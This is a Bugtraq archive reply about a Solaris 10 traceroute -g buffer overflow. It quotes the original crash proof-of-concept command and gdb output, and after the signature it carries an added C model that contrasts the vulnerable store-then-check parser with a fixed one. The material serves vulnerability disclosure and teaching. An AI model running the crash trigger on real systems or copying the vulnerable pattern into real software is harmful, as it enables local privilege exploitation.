Bugtraq mailing list archives
Re: Solaris 10 /usr/sbin/traceroute vulnerabilities
From: "Fermín J. Serna" <fjserna () ngsec com>
Date: Fri, 24 Jun 2005 22:19:51 +0200
Hello,

Please note his tests were on x86; SPARC needs a double ret in order to successfully exploit/segfault the vulnerable program, due to the register window layout on the stack.

It's like the xfont (x-something, don't remember) issues on old Solaris: exploitable (segfault) on x86 but not on SPARC, because it does exit after the first ret, so there is no double ret chance.
Best regards,

David T. Moraski II wrote:

> On Fri, 24 Jun 2005, Przemyslaw Frasunek wrote:
>
> > /usr/sbin/traceroute from Solaris 10 is vulnerable to a buffer overflow in
> > handling the -g argument. After supplying 10 -g parameters, the return
> > address is overwritten by the IP address argument:
> >
> > atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8 -g 9 -g 10 127.0.0.1
> > traceroute: too many IPv4 gateways
> > traceroute: unknown IPv4 host 1
> > traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets
> > Segmentation fault (core dumped)
> > atari:root:/home/venglin# gdb /usr/sbin/traceroute core
> > [...]
> > Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8 -g 9 -g 10 127.0.0'.
> > Program terminated with signal 11, Segmentation fault.
> > [...]
> > #0  0x0100007f in ?? ()
> >
> > 0x0100007f is of course 127.0.0.1.
>
> I ran the above command line on a Solaris 10 system, both as root and as a
> regular user, and was unable to reproduce your results; traceroute did not
> segfault or produce a core file. What was your patch level?
--
Fermín J. Serna @ NGSEC
http://www.ngsec.com
C/ O'Donnell nº 46, 3ºB
28009 Madrid
Spain
Telf.: +34 91 435 56 27
Fax.: +34 91 577 84 45
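The quoted report shows the faulting PC as 0x0100007f, which is the bytes of 127.0.0.1 in network order (7f 00 00 01) loaded as a little-endian 32-bit value. The model below, added here as an illustration and not Sun's traceroute source, shows the store-then-check pattern that produces exactly that symptom beside its check-then-store fix. Everything about the layout is an assumption: a fixed table of MAXGW gateways is assumed to sit directly below the saved return address, and the frame is modelled as a plain byte buffer so the overwrite stays well defined and can be inspected; the sample command line is constructed, and the SPARC register-window behaviour discussed in the reply is not modelled, only the byte order of the overwritten slot.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout (illustration only): MAXGW IPv4 gateways in network byte
 * order, followed immediately by a slot standing in for the saved return
 * address.  The frame is a byte buffer so the overwrite is observable. */
#define MAXGW 8
#define GW_BYTES (MAXGW * 4)
#define FRAME_BYTES (GW_BYTES + 4)      /* gateway table + return-address slot */

/* Parse a dotted quad into four network-order bytes; returns 0 on failure. */
static int parse_ipv4(const char *s, unsigned char out[4])
{
    unsigned a, b, c, d;
    char trailing;
    if (sscanf(s, "%u.%u.%u.%u%c", &a, &b, &c, &d, &trailing) != 4)
        return 0;
    if (a > 255 || b > 255 || c > 255 || d > 255)
        return 0;
    out[0] = (unsigned char)a; out[1] = (unsigned char)b;
    out[2] = (unsigned char)c; out[3] = (unsigned char)d;
    return 1;
}

/* Vulnerable pattern: store the gateway, then check the count.  The
 * (MAXGW+1)th -g argument is written one slot past the table, into the
 * return-address slot, before "too many IPv4 gateways" is reported.
 * Returns the number of gateways stored. */
static int collect_gateways_vuln(int argc, char **argv, unsigned char frame[FRAME_BYTES])
{
    int n = 0;
    memset(frame, 0xAA, FRAME_BYTES);           /* 0xAA marks untouched bytes */
    for (int i = 1; i < argc - 1; i++) {
        unsigned char addr[4];
        if (strcmp(argv[i], "-g") != 0)
            continue;
        if (!parse_ipv4(argv[++i], addr)) {
            fprintf(stderr, "traceroute: unknown IPv4 host %s\n", argv[i]);
            continue;
        }
        if ((n + 1) * 4 > FRAME_BYTES)          /* keeps the model inside its own buffer */
            break;
        memcpy(frame + n * 4, addr, 4);         /* write first ... */
        n++;
        if (n > MAXGW) {                        /* ... check afterwards: one slot too late */
            fprintf(stderr, "traceroute: too many IPv4 gateways\n");
            break;
        }
    }
    return n;
}

/* Hardened form: refuse before touching the table.
 * Returns -1 on too many gateways, otherwise the count. */
static int collect_gateways_fixed(int argc, char **argv, unsigned char frame[FRAME_BYTES])
{
    int n = 0;
    memset(frame, 0xAA, FRAME_BYTES);
    for (int i = 1; i < argc - 1; i++) {
        unsigned char addr[4];
        if (strcmp(argv[i], "-g") != 0)
            continue;
        if (!parse_ipv4(argv[++i], addr)) {
            fprintf(stderr, "traceroute: unknown IPv4 host %s\n", argv[i]);
            continue;
        }
        if (n >= MAXGW) {                       /* bound checked before the store */
            fprintf(stderr, "traceroute: too many IPv4 gateways\n");
            return -1;
        }
        memcpy(frame + n * 4, addr, 4);
        n++;
    }
    return n;
}

/* The return-address slot as a CPU would load it: little-endian (x86) and big-endian (SPARC). */
static uint32_t ret_slot_le(const unsigned char frame[FRAME_BYTES])
{
    const unsigned char *p = frame + GW_BYTES;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static uint32_t ret_slot_be(const unsigned char frame[FRAME_BYTES])
{
    const unsigned char *p = frame + GW_BYTES;
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | (uint32_t)p[3];
}

/* Constructed command line: eight filler gateways, then 127.0.0.1 as the ninth. */
static char *demo_argv[] = {
    "traceroute",
    "-g", "10.0.0.1", "-g", "10.0.0.2", "-g", "10.0.0.3", "-g", "10.0.0.4",
    "-g", "10.0.0.5", "-g", "10.0.0.6", "-g", "10.0.0.7", "-g", "10.0.0.8",
    "-g", "127.0.0.1",
    "192.0.2.1", NULL
};
#define DEMO_ARGC ((int)(sizeof demo_argv / sizeof demo_argv[0]) - 1)

int main(void)
{
    unsigned char frame[FRAME_BYTES];
    int n = collect_gateways_vuln(DEMO_ARGC, demo_argv, frame);
    printf("vulnerable: stored %d gateways, return slot reads 0x%08x (x86) / 0x%08x (SPARC)\n",
           n, (unsigned)ret_slot_le(frame), (unsigned)ret_slot_be(frame));
    n = collect_gateways_fixed(DEMO_ARGC, demo_argv, frame);
    printf("fixed: result %d, return slot byte 0x%02x (untouched)\n", n, frame[GW_BYTES]);
    return 0;
}
```

With the vulnerable parser the ninth gateway lands in the return-address slot, which an x86 CPU would pop as 0x0100007f, matching the gdb frame in the report; the same bytes read as 0x7f000001 on a big-endian SPARC. The hardened parser rejects the ninth -g before any write, so the slot keeps its filler value.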
Current thread:
- Solaris 10 /usr/sbin/traceroute vulnerabilities Przemyslaw Frasunek (Jun 24)
- Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities Przemyslaw Frasunek (Jun 24)
- Message not available
- Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities Przemyslaw Frasunek (Jun 24)
- Message not available
- Re: [Full-disclosure] Solaris 10 /usr/sbin/traceroute vulnerabilities Przemyslaw Frasunek (Jun 24)
- Re: Solaris 10 /usr/sbin/traceroute vulnerabilities David T. Moraski II (Jun 24)
- Re: Solaris 10 /usr/sbin/traceroute vulnerabilities Fermín J. Serna (Jun 24)